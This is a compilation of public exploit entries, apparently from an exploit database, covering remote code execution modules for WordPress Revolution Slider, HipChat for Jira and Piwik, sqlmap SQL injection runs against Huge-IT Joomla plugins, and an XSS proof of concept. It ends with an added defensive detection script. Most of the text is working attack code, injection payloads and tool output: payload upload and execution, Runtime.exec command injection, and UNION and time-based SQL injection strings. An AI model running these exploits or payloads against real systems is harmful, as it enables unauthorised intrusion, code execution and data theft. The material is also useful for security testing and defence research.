    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'

    # Build the zip
    payload_zip = Rex::Zip::Archive.new
    # If the filename in the zip is revslider.php it will be automatically
    # executed but it will break the plugin and sometimes WordPress
    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)

    # Build the POST body
    data = Rex::MIME::Message.new
    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")

    post_data = data.to_s

    res = send_request_cgi(
      'uri'    => wordpress_url_admin_ajax,
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    if res
      if res.code == 200 && res.body =~ /Update in progress/
        # The payload itself almost never deleted, try anyway
        register_files_for_cleanup(php_pagename)
        # This normally works
        register_files_for_cleanup('../revslider.zip')

        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)
        print_good("#{peer} - Our payload is at: #{final_uri}")
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          'uri'     => normalize_uri(final_uri),
          'timeout' => 5
        )
      elsif res.code == 200 && res.body =~ /^0$/
        # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown
        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end
  end
end
15.

# Exploit Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
# Date: 2016-09-16
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/
# Software Link:
# Version: 1.0.6
# Tested on: Linux
# CVE : CVE-2016-1000124
# Advisory: http://www.vapidlabs.com/advisory.php?v=170
# Exploit:

$ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
---
[13:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[13:30:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2715 times
[13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

[*] shutting down at 13:30:39
16. # Exploit Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
# Date: 2016-09-16
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-catalog/
# Software Link:
# Version: 1.0.7
# Tested on: Linux
# CVE : CVE-2016-1000125
# Advisory: http://www.vapidlabs.com/advisory.php?v=171
# Exploit:

$ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

    Type: UNION query
    Title: Generic UNION query (random number) - 15 columns
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
---
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[16:48:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 6637 times
[16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 16:48:10
17. # Exploit Title: Wordpress Plugin Participants Database < 1.7.5.10 - XSS
# Google Dork: inurl:wp-content/plugins/participants-database/
# Date: 01-Sep-17
# Exploit Author: Benjamin Lim
# Vendor Homepage: https://xnau.com/
# Software Link: https://wordpress.org/plugins/participants-database/
# Version: 1.7.5.9
# Tested on: Kali Linux 2.0
# CVE : CVE-2017-14126

1. Product & Service Introduction:
==================================
Participants Database is a Wordpress plugin for managing a database of participants, members or volunteers. As of now, the plugin has been downloaded 320,000 times and has 10,000+ active installs.

2. Technical Details & Description:
===================================
Cross site scripting (XSS) vulnerability in the Wordpress Participants Database plugin 1.7.5.9 allows attackers to inject arbitrary javascript via the Name parameter. The XSS vulnerability is found on the participant signup form input textfield. The get_field_value_display() function in PDb_FormElement.class.php did not escape HTML special characters, allowing an attacker to input javascript.

The XSS code will be executed on 2 pages.
1) The "Thank you for signing up" page immediately after submitting the form.
2) The page which is configured to output the list of participants with the [pdb_list] shortcode.

3. Proof of Concept (PoC):
==========================
curl -k -F action=signup -F subsource=participants-database -F shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2 -F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F 'first_name=<script>alert("1");</script>' -F last_name=a -F email=a@a.com -F mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

To trigger manually, browse to the page, input the following in the form and click Sign Up.
First Name: <script>alert("1");</script>
Last Name: test
Email: test@test.com

4. Mitigation
=============
Update to version 1.7.5.10

5. Disclosure Timeline
======================
2017/09/01 Vendor contacted
2017/09/02 Vendor responded
2017/09/03 Update released
2017/09/06 Advisory released to the public

6. Credits & Authors:
=====================
Benjamin Lim - [https://limbenjamin.com]

--
*Benjamin Lim*
E: mail@limbenjamin.com
PGP : https://limbenjamin.com/pgp
18. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'json'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Atlassian HipChat for Jira Plugin Velocity Template Injection",
      'Description'    => %q{
        Atlassian Hipchat is a web service for internal instant messaging. A plugin is available
        for Jira that allows team collaboration in real time. A message can be used to inject Java
        code into a Velocity template, and gain code execution as Jira. Authentication is required
        to exploit this vulnerability, and you must make sure the account you're using isn't
        protected by captcha. By default, Java payload will be used because it is cross-platform,
        but you can also specify which native payload you want (Linux or Windows).

        HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions
        between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with a
        vulnerable copy of HipChat.

        When using the check command, if you supply a valid username and password, the module will
        be able to trigger the bug and check more accurately. If not, it falls back to passive,
        which can only tell if the target is running on a Jira version that is bundled with a
        vulnerable copy of Hipchat by default, which is less reliable.

        This vulnerability was originally discovered internally by Atlassian.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Chris Wood', # PoC
          'sinn3r'      # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2015-5603' ],
          [ 'EDB', '38551' ],
          [ 'BID', '76698' ],
          [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ]
        ],
      'Targets'        =>
        [
          [ 'HipChat for Jira plugin on Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],
          [ 'HipChat for Jira plugin on Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],
          [ 'HipChat for Jira plugin on Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8080
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 28 2015',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        # Auth is required, but when we use the check command we allow them to be optional.
        OptString.new('JIRAUSER', [false, 'Jira Username', '']),
        OptString.new('JIRAPASS', [false, 'Jira Password', '']),
        OptString.new('TARGETURI', [true, 'The base to Jira', '/'])
      ], self.class)
  end

  # Returns a cookie in a hash, so you can ask for a specific parameter.
  #
  # @return [Hash]
  def get_cookie_as_hash(cookie)
    Hash[*cookie.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/).flatten]
  end

  # Checks the target by actually triggering the bug.
  #
  # @return [Array] Exploit::CheckCode::Vulnerable if bug was triggered.
  #                 Exploit::CheckCode::Unknown if something failed.
  #                 Exploit::CheckCode::Safe for the rest.
  def do_explicit_check
    begin
      cookie = do_login
      # I don't really care which command to execute, as long as it's a valid one for both platforms.
      # If the command is valid, it should return {"message"=>"0"}.
      # If the command is not valid, it should return an empty hash.
      c = get_exec_code('whoami')
      res = inject_template(c, cookie)
      json = res.get_json_document
      if json['message'] && json['message'] == '0'
        return Exploit::CheckCode::Vulnerable
      end
    rescue Msf::Exploit::Failed => e
      vprint_error(e.message)
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  # Returns the Jira version
  #
  # @return [String] Found Jira version
  # @return [NilClass] No Jira version found.
  def get_jira_version
    version = nil

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')
    })

    unless res
      vprint_error('Connection timed out while retrieving the Jira version.')
      return version
    end

    metas = res.get_html_meta_elements
    version_element = metas.select { |m| m.attributes['name'] && m.attributes['name'].value == 'ajs-version-number' }.first

    unless version_element
      vprint_error('Unable to find the Jira version.')
      return version
    end

    version_element.attributes['content'] ? version_element.attributes['content'].value : nil
  end

  # Checks the target by looking at things like the Jira version, or whether the Jira web app
  # exists or not.
  #
  # @return [Array] Check code. If the Jira version matches the vulnerable range, it returns
  #                 Exploit::CheckCode::Appears. If we can only tell it runs on Jira, we return
  #                 Exploit::CheckCode::Detected, because it's possible to have Jira not bundled
  #                 with HipChat by default, but installed separately. For other scenarios, we
  #                 return Safe.
  def do_passive_check
    jira_version = get_jira_version
    vprint_status("Found Jira version: #{jira_version}")

    # Compare as version numbers rather than strings: a plain string comparison sorts '6.4.2'
    # after '6.4.11' and would miss affected builds.
    if jira_version && Gem::Version.correct?(jira_version) &&
       Gem::Version.new(jira_version) >= Gem::Version.new('6.3.5') &&
       Gem::Version.new(jira_version) < Gem::Version.new('6.4.11')
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Checks the vulnerability. Username and password are required to be able to accurately verify
  # the vuln. If supplied, we will try the explicit check (which will trigger the bug, so should
  # be more reliable). If not, we will try the passive one (less accurately, but better than
  # nothing).
  #
  # @see #do_explicit_check
  # @see #do_passive_check
  #
  # @return [Array] Check code
  def check
    checkcode = Exploit::CheckCode::Safe

    if jira_cred_empty?
      vprint_status("No username and password supplied, so we can only do a passive check.")
      checkcode = do_passive_check
    else
      checkcode = do_explicit_check
    end

    checkcode
  end

  # Returns the Jira username set by the user
  def jira_username
    datastore['JIRAUSER']
  end

  # Returns the Jira password set by the user
  def jira_password
    datastore['JIRAPASS']
  end

  # Reports username and password to the database.
  #
  # @param opts [Hash]
  # @option opts [String] :user
  # @option opts [String] :password
  #
  # @return [void]
  def report_cred(opts)
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: fullname,
      post_reference_name: self.refname,
      private_data: opts[:password],
      origin_type: :service,
      private_type: :password,
      username: opts[:user]
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      last_attempted_at: Time.now
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Returns a valid login cookie.
  #
  # @return [String]
  def do_login
    cookie = ''

    prerequisites = get_login_prerequisites
    xsrf = prerequisites['atlassian.xsrf.token']
    sid  = prerequisites['JSESSIONID']

    uri = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'headers'   => { 'X-Requested-With' => 'XMLHttpRequest' },
      'cookie'    => "atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}",
      'vars_post' => {
        'os_username' => jira_username,
        'os_password' => jira_password,
        'os_captcha'  => '' # Not beatable yet
      }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
    end

    json = res.get_json_document

    if json.empty?
      fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.')
    end

    if json['loginSucceeded']
      cookie = res.get_cookies
    elsif !json['loginSucceeded'] && json['captchaFailure']
      fail_with(Failure::NoAccess, "#{jira_username} is protected by captcha. Please try a different account.")
    elsif !json['loginSucceeded']
      fail_with(Failure::NoAccess, 'Incorrect username or password')
    end

    report_cred(
      user: jira_username,
      password: jira_password
    )

    cookie
  end

  # Returns login prerequisites
  #
  # @return [Hash]
  def get_login_prerequisites
    uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')
    res = send_request_cgi({ 'uri' => uri })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites')
    end

    get_cookie_as_hash(res.get_cookies)
  end

  # Returns the target platform.
  #
  # @param cookie [String] Jira cookie
  # @return [String]
  def get_target_platform(cookie)
    c = get_os_detection_code
    res = inject_template(c, cookie)
    json = res.get_json_document
    json['message'] || ''
  end

  # Returns Java code that can be used to inject to the template in order to write a file.
  #
  # @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code,
  #       and then execute the new file instead.
  #
  # @param fname [String] File to write to.
  # @param p [String] Payload
  # @return [String]
  def get_write_file_code(fname, p)
    b64 = Rex::Text.encode_base64(p)
    %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) |
  end

  # Returns the Java code that gives us the remote Java home path.
  #
  # @return [String]
  def get_java_path_code
    get_java_property_code('java.home')
  end

  # Returns the OS/platform information.
  #
  # @return [String]
  def get_os_detection_code
    get_java_property_code('os.name')
  end

  # Returns the temp path for Java.
  #
  # @return [String]
  def get_temp_path_code
    get_java_property_code('java.io.tmpdir')
  end

  # Returns a system property for Java.
  #
  # @param prop [String] Name of the property to retrieve.
  # @return [String]
  def get_java_property_code(prop)
    %Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() |
  end

  # Returns the Java code to execute a jar file.
  #
  # @param java_path [String] Java home path
  # @param war_path [String] The jar file to execute
  # @return [String]
  def get_jar_exec_code(java_path, war_path)
    # A quick way to check platform instead of actually grabbing os.name in Java system properties.
    if /^\/[[:print:]]+/ === war_path
      normalized_java_path = Rex::FileUtils.normalize_unix_path(java_path, '/bin/java')
      cmd_str = %Q|#{normalized_java_path} -jar #{war_path}|
    else
      normalized_java_path = Rex::FileUtils.normalize_win_path(java_path, '\\bin\\java.exe')
      war_path.gsub!(/Program Files/, 'PROGRA~1')
      cmd_str = %Q|cmd.exe /C #{normalized_java_path} -jar #{war_path}"|
    end

    %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd_str}').waitFor() |
  end

  # Returns Java code that can be used to inject to the template in order to execute a file.
  #
  # @param cmd [String] command to execute
  # @return [String]
  def get_exec_code(cmd)
    %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd}').waitFor() |
  end

  # Returns Java code that can be used to inject to the template in order to chmod a file.
  #
  # @param fname [String] File to chmod
  # @return [String]
  def get_chmod_code(fname)
    get_exec_code("chmod 777 #{fname}")
  end

  # Returns Java code that can be used to inject to the template in order to copy a file.
  #
  # @note The purpose of this method is to have a file that is not busy, so we can execute it.
  #       It is meant to be used with #get_write_file_code.
  #
  # @param fname [String] The file to copy
  # @param new_fname [String] The new file
  # @return [String]
  def get_dup_file_code(fname, new_fname)
    if fname =~ /^\/[[:print:]]+/
      cp_cmd = "cp #{fname} #{new_fname}"
    else
      cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}"
    end

    get_exec_code(cp_cmd)
  end

  # Returns a boolean indicating whether the module has a username and password.
  #
  # @return [TrueClass] There is an empty cred.
  # @return [FalseClass] No empty cred.
  def jira_cred_empty?
    jira_username.blank? || jira_password.blank?
  end

  # Injects Java code to the template.
  #
  # @param p [String] Code that is being injected.
  # @param cookie [String] A cookie that contains a valid JSESSIONID
  # @return [void]
  def inject_template(p, cookie)
    login_sid = get_cookie_as_hash(cookie)['JSESSIONID']
    uri = normalize_uri(target_uri.path, 'rest', 'hipchat', 'integrations', '1.0', 'message', 'render')
    uri << '/'

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'cookie' => "JSESSIONID=#{login_sid}",
      'ctype'  => 'application/json',
      'data'   => { 'message' => p }.to_json
    })

    if !res
      # This seems to trigger every time even though we're getting a shell. So let's downplay
      # this a little bit. At least it's logged to allow the user to debug.
      elog('Connection timed out in #inject_template')
    elsif res && /Error report/ === res.body
      print_error('Failed to inject and execute code:')
      vprint_line(res.body)
    elsif res
      vprint_status("Server response:")
      vprint_line res.body
    end

    res
  end

  # Checks if the target os/platform is compatible with the module target or not.
  #
  # @return [TrueClass] Compatible
  # @return [FalseClass] Not compatible
  def target_platform_compat?(target_platform)
    target.platform.names.each do |n|
      if /^java$/i === n || /#{n}/i === target_platform
        return true
      end
    end

    false
  end

  # Returns the normalized file path for payload.
  #
  # @return [String]
  def normalize_payload_fname(tmp_path, fname)
    # A quick way to check platform instead of actually grabbing os.name in Java system properties.
    if /^\/[[:print:]]+/ === tmp_path
      Rex::FileUtils.normalize_unix_path(tmp_path, fname)
    else
      Rex::FileUtils.normalize_win_path(tmp_path, fname)
    end
  end

  # Returns a temp path from the remote target.
  #
  # @param cookie [String] Jira cookie
  # @return [String]
  def get_tmp_path(cookie)
    c = get_temp_path_code
    res = inject_template(c, cookie)
    json = res.get_json_document
    json['message'] || ''
  end

  # Returns the Java home path used by Jira.
  #
  # @param cookie [String] Jira cookie.
  # @return [String]
  def get_java_home_path(cookie)
    c = get_java_path_code
    res = inject_template(c, cookie)
    json = res.get_json_document
    json['message'] || ''
  end

  # Exploits the target in Java platform.
  #
  # @return [void]
  def exploit_as_java(cookie)
    tmp_path = get_tmp_path(cookie)
    if tmp_path.blank?
      fail_with(Failure::Unknown, 'Unable to get the temp path.')
    end

    jar_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
    jar = payload.encoded_jar
    java_home = get_java_home_path(cookie)

    register_files_for_cleanup(jar_fname)

    if java_home.blank?
      fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')
    else
      print_status("Found Java home path: #{java_home}")
    end

    print_status("Attempting to write #{jar_fname}")
    c = get_write_file_code(jar_fname, jar)
    inject_template(c, cookie)

    print_status("Executing #{jar_fname}")
    c = get_jar_exec_code(java_home, jar_fname)
    inject_template(c, cookie)
  end

  # Exploits the target in Windows platform.
  #
  # @return [void]
  def exploit_as_windows(cookie)
    tmp_path = get_tmp_path(cookie)
    if tmp_path.blank?
      fail_with(Failure::Unknown, 'Unable to get the temp path.')
    end

    exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
    exe_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.exe")
    exe_new_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.exe")
    exe_fname.gsub!(/Program Files/, 'PROGRA~1')
    exe_new_fname.gsub!(/Program Files/, 'PROGRA~1')

    register_files_for_cleanup(exe_fname, exe_new_fname)

    print_status("Attempting to write #{exe_fname}")
    c = get_write_file_code(exe_fname, exe)
    inject_template(c, cookie)

    print_status("New file will be #{exe_new_fname}")
    c = get_dup_file_code(exe_fname, exe_new_fname)
    inject_template(c, cookie)

    print_status("Executing #{exe_new_fname}")
    c = get_exec_code(exe_new_fname)
    inject_template(c, cookie)
  end

  # Exploits the target in Linux platform.
  #
  # @return [void]
  def exploit_as_linux(cookie)
    tmp_path = get_tmp_path(cookie)
    if tmp_path.blank?
      fail_with(Failure::Unknown, 'Unable to get the temp path.')
    end

    fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
    new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))

    register_files_for_cleanup(fname, new_fname)

    print_status("Attempting to write #{fname}")
    p = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
    c = get_write_file_code(fname, p)
    inject_template(c, cookie)

    print_status("chmod +x #{fname}")
    c = get_exec_code("chmod 777 #{fname}")
    inject_template(c, cookie)

    print_status("New file will be #{new_fname}")
    c = get_dup_file_code(fname, new_fname)
    inject_template(c, cookie)

    print_status("Executing #{new_fname}")
    c = get_exec_code(new_fname)
    inject_template(c, cookie)
  end

  def exploit
    if jira_cred_empty?
      fail_with(Failure::BadConfig, 'Jira username and password are required.')
    end

    print_status("Attempting to login as #{jira_username}:#{jira_password}")
    cookie = do_login
    print_good("Successfully logged in as #{jira_username}")

    target_platform = get_target_platform(cookie)
    print_status("Target being detected as: #{target_platform}")
    unless target_platform_compat?(target_platform)
      fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
    end

    case target.name
    when /java$/i
      exploit_as_java(cookie)
    when /windows$/i
      exploit_as_windows(cookie)
    when /linux$/i
      exploit_as_linux(cookie)
    end
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_good(msg='')
    super("#{peer} - #{msg}")
  end

  def print_error(msg='')
    super("#{peer} - #{msg}")
  end
end
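The module above gives defenders two concrete handles: the affected Jira range (6.3.5 to 6.4.10 ship a vulnerable HipChat plugin) and the shape of the injected Velocity code, which always bootstraps through `$i18n.getClass().forName(...)` posted as the `message` field to the `/rest/hipchat/integrations/1.0/message/render/` endpoint. The block below is an added example written for this page, not part of the Metasploit module or of Atlassian's advisory. It compares versions numerically with `Gem::Version` (a plain string comparison of the kind the module's passive check used would sort `'6.4.2'` after `'6.4.11'`) and scans request records for the reflection markers so a log reviewer or WAF rule can key on them. The request records, paths and marker list are constructed for the example; the endpoint and range come from the module.

```ruby
require 'rubygems'
require 'json'

# Added example (not from the Metasploit module): defender-side checks for the
# HipChat for Jira Velocity template injection (CVE-2015-5603).

# Jira versions that were bundled with a vulnerable HipChat plugin, per the module description.
AFFECTED_JIRA_MIN = Gem::Version.new('6.3.5')
AFFECTED_JIRA_MAX = Gem::Version.new('6.4.10')

# The render endpoint the injected message is posted to (path used by the module).
RENDER_ENDPOINT = %r{/rest/hipchat/integrations/1\.0/message/render/?\z}

# Reflection chains the injected Java code is built from. Constructed marker list:
# any of these inside a rendered message is not something a chat message should carry.
TEMPLATE_INJECTION_MARKERS = [
  /\$i18n\.getClass\(\)\.forName\(/i,       # reflection bootstrap through the i18n bean
  /java\.lang\.Runtime/i,                   # process execution
  /java\.io\.FileOutputStream/i,            # file write
  /getMethod\(\s*['"]getProperty['"]/i      # System.getProperty(...) fingerprinting
].freeze

# True when the version string falls inside the bundled-HipChat range. Non-version
# strings and nil are treated as "unknown", i.e. not flagged.
def jira_bundled_hipchat_affected?(version_string)
  return false unless version_string && Gem::Version.correct?(version_string)

  Gem::Version.new(version_string).between?(AFFECTED_JIRA_MIN, AFFECTED_JIRA_MAX)
end

# Return the marker patterns (as source strings) that a single request trips.
# Only POSTs to the render endpoint are inspected; the 'message' field is taken
# from the JSON body, and a non-JSON body is scanned as-is.
def template_injection_markers(method, path, body)
  return [] unless method.to_s.upcase == 'POST' && path.to_s =~ RENDER_ENDPOINT

  message = begin
    JSON.parse(body.to_s).fetch('message', '').to_s
  rescue JSON::ParserError
    body.to_s
  end

  TEMPLATE_INJECTION_MARKERS.select { |re| re.match?(message) }.map(&:source)
end

# Run over request records ({id:, method:, path:, body:}) and keep those with hits.
def flag_requests(requests)
  requests.each_with_object([]) do |req, hits|
    markers = template_injection_markers(req[:method], req[:path], req[:body])
    hits << { id: req[:id], markers: markers } unless markers.empty?
  end
end

# Constructed sample traffic (no real hosts): a benign render, an os.name probe of the
# kind the module's get_java_property_code builds, and an unrelated GET.
SAMPLE_REQUESTS = [
  { id: 1, method: 'POST', path: '/jira/rest/hipchat/integrations/1.0/message/render/',
    body: { 'message' => 'Deploy finished, see JIRA-123' }.to_json },
  { id: 2, method: 'POST', path: '/jira/rest/hipchat/integrations/1.0/message/render/',
    body: { 'message' => %q{$i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, 'os.name')} }.to_json },
  { id: 3, method: 'GET', path: '/jira/secure/Dashboard.jspa', body: '' }
].freeze

if __FILE__ == $PROGRAM_NAME
  %w[6.3.4 6.3.5 6.4.2 6.4.10 6.4.11].each do |v|
    puts "Jira #{v}: #{jira_bundled_hipchat_affected?(v) ? 'bundled HipChat affected' : 'outside range'}"
  end
  flag_requests(SAMPLE_REQUESTS).each do |hit|
    puts "request #{hit[:id]} matched: #{hit[:markers].join(' | ')}"
  end
end
```

The version check is the part worth reusing: it is the same comparison that decides whether a Jira instance needs the plugin updated, and it returns false rather than raising on an empty or malformed `ajs-version-number` value.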
19. ##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Piwik Superuser Plugin Upload',
      'Description'    => %q{
        This module will generate a plugin, pack the payload into it and upload it to a server
        running Piwik. Superuser Credentials are required to run this module. This module does
        not work against Piwik 1 as there is no option to upload custom plugins.
        Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'FireFart' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ]
        ],
      'DisclosureDate' => 'Feb 05 2017',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Piwik', {}]],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of the Piwik installation', '/']),
        OptString.new('USERNAME', [true, 'The Piwik username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The Piwik password to authenticate with'])
      ], self.class)
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def normalized_index
    normalize_uri(target_uri, 'index.php')
  end

  def get_piwik_version(login_cookies)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalized_index,
      'cookie'   => login_cookies,
      'vars_get' => {
        'module' => 'Feedback',
        'action' => 'index',
        'idSite' => '1',
        'period' => 'day',
        'date'   => 'yesterday'
      }
    })

    piwik_version_regexes = [
      /<title>About Piwik ([\w\.]+) -/,
      /content-title="About&#x20;Piwik&#x20;([\w\.]+)"/,
      /<h2 piwik-enriched-headline\s+feature-name="Help"\s+>About Piwik ([\w\.]+)/m
    ]

    if res && res.code == 200
      for r in piwik_version_regexes
        match = res.body.match(r)
        if match
          return match[1]
        end
      end
    end

    # check for Piwik version 1
    # the logo.svg is only available in version 1
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri, 'themes', 'default', 'images', 'logo.svg')
    })

    if res && res.code == 200 && res.body =~ /<!DOCTYPE svg/
      return "1.x"
    end

    nil
  end

  def is_superuser?(login_cookies)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalized_index,
      'cookie'   => login_cookies,
      'vars_get' => {
        'module' => 'Installation',
        'action' => 'systemCheckPage'
      }
    })

    if res && res.body =~ /You can't access this resource as it requires a 'superuser' access/
      return false
    elsif res && res.body =~ /id="systemCheckRequired"/
      return true
    else
      return false
    end
  end

  def generate_plugin(plugin_name)
